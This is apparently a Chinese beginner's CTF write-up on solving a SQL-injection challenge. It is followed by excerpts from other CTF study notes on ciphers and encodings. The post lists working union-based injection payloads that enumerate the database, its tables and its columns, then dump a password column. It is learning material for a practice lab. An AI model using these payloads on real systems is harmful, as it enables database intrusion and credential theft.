1.題目
2.解題步驟
題目提示了sqlmap,還是老規矩試一下
繼續使用其他sql語句嘗試一下,先試試萬能的1' or 1=1 #
,結果成功了…爆出一段奇妙的碼,試了一下不是flag。接下來嘗試一下查詢呢
試一下聯合查詢1' union select 1#
換個姿勢(這裡純粹是懵的,沒想到中了)
嗯?這裡的直接通過了,然後回顯了2和3,應該是爆出了字段,再看看一共有多少欄位呢
出4的時候報錯,可見是一共四個字段。然後查庫名1' union select 1,database(),3#
可見庫名是geek。繼續查詢1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='geek',3#
(這個payload是照師傅抄的,group_concat()函式的功能是:將group by產生的同乙個分組中的值連線起來,返回乙個字串結果。 information_schema理解為是資料庫的資訊,而 information_schema.tables where table_schema='geek』的含義就是查詢資料庫中geek庫的資訊。)
這個報錯看蒙了…繼續看wp,這裡已經提示我們要在3位置查詢。1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
可見有兩個表,繼續查詢1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek'#
這裡的id , username , password 應該就是欄位了。
這下庫,表,欄位都清楚了,這裡師傅直接盲猜的l0velysql表裡面的password…這可能就是大佬の直覺吧。
構造1' union select 1,2,group_concat(password) from l0ve1ysq1 #
3.總結
第一次做聯合查詢的題,但基本上都是跟著師傅的wp在做,學習了聯合查詢的payload的構造方式
sqlmap也有測試過聯合查詢,但是不清楚為什麼沒報錯。
sql語句實在是太多,回頭要整理乙個sql的漏洞集合和函式庫。
聯合查詢的時候後面的2和3也沒看懂,師傅說是注入點,開始以為是欄位名,後來發現也不是。
4.參考資料
ctf學習筆記
ctf學習記錄一 第一次寫部落格,出於對ctf學習的熱情。可能是覺得這件事很酷,很有挑戰性吧。關注ctf有了一段時間了,但總是有無從下手的感覺。前期在網上零零碎碎看過許多資料,各種環境,各種命令看得頭大,收穫卻不是很多。後來發現在網上看大佬解題是個不錯的方法,雖然還是有相當一部分看不懂,但總算有了一...
CTF 密碼學 學習筆記
rot13 特殊的凱撒密碼 埃特巴什碼 atbash cipher 第乙個字母對應最後乙個字母,第二個對應倒數第二個 簡單替換密碼 替換密碼表沒有規律,利用詞頻分析破解 仿射密碼 通過數學函式建立字母對映 一元一次函式 維吉尼亞密碼 vigenere 使用一系列凱撒密碼組成密碼字母表的加密演算法,行...
CTF筆記 編碼
toc ctf筆記 編碼型別 u開頭的是unicode編碼。支援中文和英文。很容易和url編碼混淆。u開頭的是二進位制編碼 加密型別特徵 base64 base64中包含大寫字母 a z 小寫字母 a z 數字0 9以及 一般以 結尾 base32 base32中只有大寫字母 a z 和數字2345...